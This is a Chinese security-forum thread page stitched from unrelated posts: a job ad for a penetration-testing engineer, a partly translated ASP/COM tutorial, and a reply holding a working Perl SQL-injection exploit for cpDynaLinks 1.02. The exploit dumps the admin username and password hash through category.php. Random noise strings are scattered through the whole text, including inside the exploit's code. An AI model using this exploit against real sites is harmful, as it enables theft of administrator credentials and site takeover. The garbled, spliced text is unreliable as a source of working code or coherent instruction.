最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 安全宝招聘安全服务工程师

  • 招聘职位: 网络安全测试工程师
  • 公司名称: 星云融创(北京)科技有限公司
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 高中
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.anquanbao.com/
  • 简历邮箱: root@cnseay.com
  • 联系电话: 400-805-4999
  • 在线QQ: 120311543
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++星云融创(北京)科技有限公司相关说明++++++++++

    安全宝招聘安全服务工程师& ]$ U! j% M2 \9 n! w1 J- q9 y/ h
    : S% t' @- G( A
    岗位描述:
    - C  B$ w* h7 R- v1、对客户网站进行渗透测试与安全评估,并完成测试报告   \4 I2 ^0 @. _
    2、对被入侵网站进行应急响应,清理web以及系统后门,根据日志分析发现黑客利用的漏洞 % i) R: E7 `& C. R5 ?5 L
    3、分析客户代码中存在的安全问题,并提出合理的解决方案 ( P# k$ ~* D' |& @3 q5 U( i
    4、能在非工作时间进行应急响应,必要时可以出差
    ! ]3 Q& k  j9 u+ z1 z
    : x4 |; W6 F+ c, `# ^$ m能力要求: / s3 C9 W2 s# r9 n+ R
    1、熟悉渗透测试原理,熟练运用各种安全、黑客工具。熟悉windows、linux平台的攻击技巧。
    . y3 p3 |: q! b% Z' B$ Z( R1 |2、关注最新web应用、系统的漏洞,并能深入了解漏洞原理
    : |1 O! E: `1 d3、熟悉黑色产业链,熟悉挂马、黑链等黑客惯用手法
    5 O) \+ i6 h9 q0 @% ?: y) J; `4、有wooyun ID且rank大于200者优先 ) l/ m1 d( L9 g$ ?* T3 V8 K
    5、有客户第一的服务意识,能站在客户立场想问题。心理素质较好,对于繁琐的工作有耐心。
    % T+ r& v' v7 {6 O0 C1 [/ _6、有创新精神,有追求完美的品质,愿意主动改进工作流程,精益求精。
    . [% _0 i. |6 W. ]7、沟通能力良好,能把技术讲的让小白用户都能听懂的优先。
    " k" {; Y/ w. o3 y9 x; @; [4 G) L

    * O2 w% y! N4 w! ?  e工作地点:北京
    . C9 `  u& h8 W. h# W  F" b8 T" _有兴趣的发简历到邮箱: # t2 |- L: V+ }* I5 c$ T
    root@cnseay.com

     

    您可能还想看的主题:

    Windows 优化大师 Pro v7.99 木蚂蚁社区绿色专版

    腾讯招聘业务安全工程师

    windows SDK 系列课程全套

    浙江政安信息安全研究中心招贤纳士啦!

    简单web服务器文件管理5.3缓冲区溢出

    记一次曲折的渗透和另类的提权

    PHP 5.4 (5.4.3) Code Execution (Win32)

    Android系统再现木马,变身驱动程式袭击用户

    马化腾:Android时代将存在安全危机

    研究人员发现新型“无文件”恶意软件

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    COM编程模型
    概述如果你用ASP做开发, 你可能已经在你的ASP页面中用过COM了.但是,在你自己开发一个COM部件或阅读一本详细介绍COM的书之前,你很可能并没有完全理解COM,因而不能充分利用它来创建你的ASP页面.同时,你也不能很好的理解那些随COM部件带来的使用文档.如果你知道COM的标准和限制,你就可以很快的学会开发其他的COM部件.在这个教程里,我们将学到COM是怎样工作的,你还将学到精通COM的知识.

    / K/ H8 m* x7 G" `6 a
    本教程的读者本教程将给那些已经使用过VBscript 语言的,特别是用过ADO但是不知道那就是COM的人详细描述COM模型.他将告诉你:

    $ R+ ~" A3 b, q5 S' o8 a7 E
    1.属性和方法的区别2.属性需要参数吗3.只读属性是什么意思4.什么是集合对象5.每个集合对象都有些什么属性6.不调用方法如何对集合排序7.在一个DLL中可以有多少个COM部件.
    + w+ W, L5 t# m! }0 o4 K' p
    基础知识COM是一个对象接口的标准.定义一个COM对象只需要定义方法和属性,没有其他的接口.从一个程序员的观点来看,属性和方法之间没有太大的区别.方法可以带参数,属性不能.属性可以读写,方法如果要返回值的话,是只读的.

    ( o$ z4 n+ o" K( u% m" X' D
    尽管从编程角度看,属性和方法没有太大的区别,但是部件开发者用他们完成不同的功能.属性通常代表一个对象的状态,但是调用方法可以完成任何想完成的任务,不管他包含对象的状态与否.
    7 y4 D. \4 ~& w8 W$ j( V; U1 r- B
    属性属性不需要参数,用来描述或设置对象的状态.所有的属性返回一个值,有些属性是只读的,有些是可读可写的.下面是VBscript中读取属性的表达式例:

    ) r5 L+ K! z/ u0 S- a, _. [0 D
    例 1:
    7 R; ^0 L+ Q( `! D, r- h) Z
    value = object.property

    8 n- Q9 q/ a9 z$ `& o
    注意这里没有用括号.例二是设置属性例:
    ) Z/ |1 t5 i- H- d
    例 2:

    * ~9 a3 D* y& ~+ B. _: S
    object.property = value

    + k' C  T. q7 _4 l" q
    方法方法可以带参数,可以返回值.通常用来初始化一个对象的事件.当给方法传递参数时,方法可以用来设置值.如果方法只返回值,不设置值的话,表达式如下:
    5 A# }4 ~! O0 X% T& X" T2 W% E7 E" h
    例 3:

    9 `) z% g1 N- \% B- Y
    value = object.method()
    9 R; [; W1 f" b+ w
    注意例3中用了括号.调用方法来返回值时必须用括号.例如,对象Connection有一个Execute方法返回一个Recordset对象.例:

    9 i4 _5 Y" {: J. o! u$ p2 u
    例 4:

    3 V5 q- a2 J; O  c
    Set RS = Conn.Execute("SELECT * FROM TABLE")

    - {3 Q6 o: u/ F7 |/ T/ o: @  B. k
    不用返回值,不用参数的方法,如Connection对象的Close方法:
    6 k+ \8 g, {. _2 C0 z3 F- k* }
    例 5:
    7 p  o6 \' c# d) k4 [
    Conn.Close
      A( d& a, Z* W- `
    参数方法可以带一个或多个参数,或一个也不要.但是,参数并不是必需的. 一旦一个参数是可选的,其后的参数都是可选的.例如,参数一和参数二是必需的,参数三是可选的,则参数四必定是可选的.一个很好的例子是Connection对象的Open方法.他有八个可选的参数.前三个用来传递数据库和等录的信息.你可以像例6那样调用Open方法:

      ^4 Z# V2 m5 M5 r) i1 d
    例 6:
    2 m2 b4 G. E$ k! u' {4 B6 o
    Conn.Open "DSN","sa",""
    ) o! ]! h/ r9 G( F7 B0 u
    为了提供DSN名,用户名,口令为空,你也可以想例7那样调用:

    ) h$ E, s1 C' R2 L: V: Y6 A1 W
    例 7:

    # d4 q* w+ K; E% T" B3 x2 j: i
    Conn.Open "driver=SQL Server;server=yourServerName;uid=someUID;" &_"pwd=somePWD;database=someDatabase;"
    ; W( \6 D2 P' a$ U+ A% S
    注意在例6中我们用了三个参数,在例7中只用了一个,结果是一样的.
    2 ^4 [7 }+ Q) C# c
    调用方法时,以逗号分隔,让可选的参数空着,将给该参数传递空值,在例6中,可选参数用缺省值,在例八中用空值.

    8 H) ~+ {+ g1 z) u
    例 8:
    9 f; J$ Z( ?: t1 \0 R* M& s
    Conn.Open "DSN","sa","", , , ,

    & N3 D4 f1 \0 }
    集合集合是本身包含了许多对象的对象集,所有的集合都包含一些预定义的方法和属性.一个集合有一个Item方法,一个Count属性,一个 _NewEnum方法.集合有建立类型与他相同的对象的能力.换句话说,如果一个对象可以被包含进一个集合中,那么,哎,这句话好难,我不翻了,给出原文吧.( In other words, if a particular object can be group in a set then that object will have a collection object that can create an instance of an object within the set. For instance, a Drives collection object will contain a set of drives that might represent all the drives on a particular computer).

    " l, F0 |5 I" O8 I* b5 Q
    Count属性返回一个代表集合中元素个数的长整型值.给Item方法传递一个长整数(当然应在1和Count之间),就返回集合中这个索引所指向的对象.就像数组那样.(原文此处混乱,稍做调整)
    8 m6 s/ F- c1 s. K& B% {+ ?6 N
    例 9(1):

    / @- p0 q- C  @* `- F
    Set Object = Collection.Item(2)
    5 y! q) i  L$ s3 B
    因为Item是缺省方法,所以你也可以如下调用:
    ' f& b! n0 k8 [
    例 9(2):
    ! L" c6 O2 w3 ^& ?  w- {
    Set Object = Collection(2)
    ; ^0 F8 N! _/ [: ^
    6 f( j$ c9 p. |( J
    _NewEnum 方法可以反复调用,

    ; e" v# Z# y) l; D& A4 ]
    例 9:
    " L2 J5 n/ o8 x7 V
    For Each Object in Collection

    / z: T; ~& @" ~
    Next Object

    & d8 `2 Q9 s4 g8 V! k1 b
    (以下不译)Notice that the _NewEnum method is not referenced within the syntax of the statement in example 6. This is because the _NewEnum method has a special index that Visual Basic recognizes as being used for the For Next statement. As a little background, all methods and properties in a COM object are indexed and certain indexes are used for particular tasks. For example the zero index is used for the default method or property. The Default Method or PropertyThe method or property that has the COM index of zero is called the default property. Visual Basic allows the programmer to not use the regular method/property syntax when calling the default value, you can leave the syntactical call to the method/property off all together. For example, the default method in all collections is the Item method. If you where going to call the Item method, you could do it like it in example 9.

    ( q1 j- z9 {1 R) d  \' s% x  E4 U

    6 o  c. p, y+ C8 @6 l  D2 d
    为了在ASP中建立一个COM对象,你可以:

    ' g! j* {9 @6 t, q1 o9 s8 Q
    例 11:
    + W% M: T) W" w7 R
    Set Object Server.CreateObject("SMUM.XCheck.1")
    9 E$ g5 D8 t5 @4 F, J" m
    给Server的CreateObject方法只传递了一个参数,就是一个ID值,这是一个由COM部件提供者给出的,唯一地标识一个COM对象的符号.为了创建一个COM对象的实例,你必须知道该对象的ID值.
    . W4 e' p/ V: q2 y8 Q! m4 @* ^: Z+ e
    有另外一种方法可以获得一个对象的实例,你可以用一个已经存在的对象实例来创建一个新的对象实例,事实上使用集合时就是这样工作的,你调用Item方法,返回了一个对象实例.
    5 z2 A" Z7 A8 b: R# a2 B7 E
    例 12:

    ( V1 t0 n# A& v) ^* M
    Set Object = Collection.Item(2)

    * w- X. m6 S) e  X8 U. Z
    例11和例12有一点是一样的,那就是都是从别的对象创建对象,区别是,CreateObject可以创建任何类型的对象,而Item只能返回集合中的对象.就像先有鸡,还是先有蛋的问题一样,你可能要问,Server对象又是怎么来的呢?事实上,这是内置对象.他存在于ASP当中.

    9 X4 D* F0 P) ]9 J) z
    内置对象ASP中有六个内置对象,他们是:Server Request Response ObjectContext Application Session 这些对象与其他对象唯一不同的是,不需要创建实例.他们与其他对象表现得一样,有自己的方法和属性.因为他们是内置的,所以你不需知道他们的ID,事实上,你根本不需调用CreateObject去创建他们.
    - k( f6 T- P' |5 S7 b
    对象ID如果你创建对象的主要方法就是调用 CreateObject 的话,知道对象的ID就非常重要了COM部件提供者在他们的文档里回提供对象的ID的.

    0 P$ k. Z" ^# r
    (以下不译)The DocumentationNow that we have established the understanding between methods and properties along with their different attributes, we need to understand how the documentation for the objects represents these attributes. For examples, we are going to look at 15 Seconds' component section, which is in the same format as the IIS 4.0 component documentation. Read and Write PropertiesA good example of a read/write property is that of the PhoneTranslate property of the XCheck object, shown here in example 11:
    : R# S4 R: F" ^9 c1 N( }# M- U4 |6 N
    Example 13 object.PhoneTranslate[= value] Notice the value syntax, this is the indication of a property that can be written to. The brackets denote that the property is optional, in other words you do not need to set the property to use the object. Click here to view the full documentation. Read Only PropertiesA good example of a read only property is the Expires property of the ASPMail object.

    7 X! d9 w0 J5 T' |3 ^  [) b0 s
    Example 14 object.Expires Notice that unlike example 11 there is not an equal symbol, indicating this is read only. Click here to view the full documentation. Optional Method ArgumentsA good example of the optional arguments is the SendX method of the OCXMail object. The documentation syntax can be seen here in example 12:
    ( ?  U) [. z! R3 ^# @' K2 s
    Example 12 object.SendX(mailserver[, fromName[, fromAddress[, priority[, returnReceipt[, toAddressList[, ccAddressList[, bccAddressList[, attach[, messageSubject[, messageText]]]]]]]]]]) Notice that the only required argument is the mailserver argument. All the rest, noted by the brackets are optional. Click here to view the full documentation. SummaryWith a fundamental understanding of COM and it's abilities, coupled with good documentation you can expand the flexibility of your Active Server page programming. Take the information that you already know about programming IIS objects, like Session objects and ADO, and expand on that by adding more COM objects to your repertoire. Third party COM object will allow you to expand your Active server applications and accomplish tasks rapidly by leveraging the component object model.
      G8 Y4 ^! K; }1 f' a5 h+ k

    ( N  j# `7 x/ |6 k2 [& E& j; m4 e: C8 H

    . L( ^6 m" U* r3 n# [( s2 Q; j  X: w" X/ s
    $ g% D9 |: A( r( K

    # J9 V8 c8 ~$ J1 {, V. X( {7 L4 z4 B, t3 H5 b& P

    2 [: f- _# I3 i, G* Q6 [! [2 B( G$ @6 x% w- C7 S- e2 W5 a# T

    # _8 c$ ^" p5 {. J
    - f1 C& S& A, A" H/ z3 M2 `7 ~* V: P8 G5 {2 ]) ]! G( f

    8 x. e6 R* B0 e7 X2 n
    + X& q( t  {/ E$ c8 e# e' }4 H$ E& V, M& V' K5 C" U, n/ w

    & V& Q; Z( z( ~# u7 l/ Z5 e% E7 c' ^5 T- Q
    , z2 ^* `9 }- l+ \3 P
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    cpdynalinks 1.02远程sql注射
    CMD环境下使用

    - D. O& Y/ \/ [, e, f3 q. t  m- {" }9 U
    #!/usr/bin/perl# cpDynaLinks 1.02 Remote Sql Inyection exploit# download:# http://www.cplinks.com/download/cpdynalinks/cpdynalinks_version_1_02_full.zip# bug found by s0cratex# exploit written by ka0x# D.O.M TEAM 2007# d0rk: Powered by cpDynaLinks# need magic_quotes_gpc off# contact: <ka0x01[at]gmail.com> <s0cratex[at]nasa.gov># ka0x@domlabs:~# perl cpdynalinks.pl http://127.0.0.1/## [+] connecting in http://127.0.0.1/...# [!] user: admin  [!] pass: c9cb9115e90580e14a0407ed1fcf8039use strict;use LWP::UserAgent;my $host = $ARGV[0];if(!$ARGV[0]) {    print "
    1 ]# G$ F' O4 ~- e$ X* K: H[x] cpDynaLinks 1.02 Remote Sql Inyection exploit
    * w  W- I- \4 P- _6 h! \0 p";    print "[x] written by ka0x - ka0x01[at]gmail.com3 s+ ?% `% o- _
    ";    print "[x] usage: perl $0 [host]
      g2 o0 E4 U( k+ @";    print "[x] example: http://host.com/cpDynaLinks
    ( O7 Y" `: ?' W4 a, i& u";    exit(1);}    print "
    4 F# k. C7 K/ y' M) q& s[+] connecting in $host...
    3 d5 ^+ v, I7 [% n4 b1 W";    my $cnx = LWP::UserAgent->new() or die;    my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,admin_username,0x20205b215d20706173733a20,admin_password,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");    if ($go->content =~ m/____(.*?)____/ms) {        print "$1: P/ w+ s3 X2 H% L! ^, x' ~
    ";    } else {        print "
    4 \( I5 T. J# ?) e. ^+ |' K[-] exploit failed
    # Y$ C# w; b- [& ?. R";    }
    ; ]! P' D: a# g$ A
    7 r# Q" v8 f& A5 H0 e% g

    3 S& O1 U, q5 U0 H' O% @1 G- T: E3 o3 N& W: l/ I$ r$ a7 }1 N- }
    ; q5 j9 [2 h* v: i' p
    / H8 ?$ ~2 f0 W* e

    / V$ ^4 k- n- W1 ~+ A) ^
    ) [7 Y6 K: y6 t+ ?$ m, }# B7 B/ z2 t& R' F

    3 ?4 t& j6 O( c4 n
    , f$ Q8 |' t- D/ u; `- f1 J4 W
    + |0 z) m8 I5 `5 w4 C! `; m3 y9 T% m

    * j: m. R3 m9 W/ w0 W: y( d
    % @4 y- K! x) X! |
    8 N2 i( y& X3 O* d+ I. ?
    " S- w' D/ t. t- E# g7 l% C9 C* o- F' p) `! n" A

    0 l! r. y9 X5 t' d9 K2 w公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表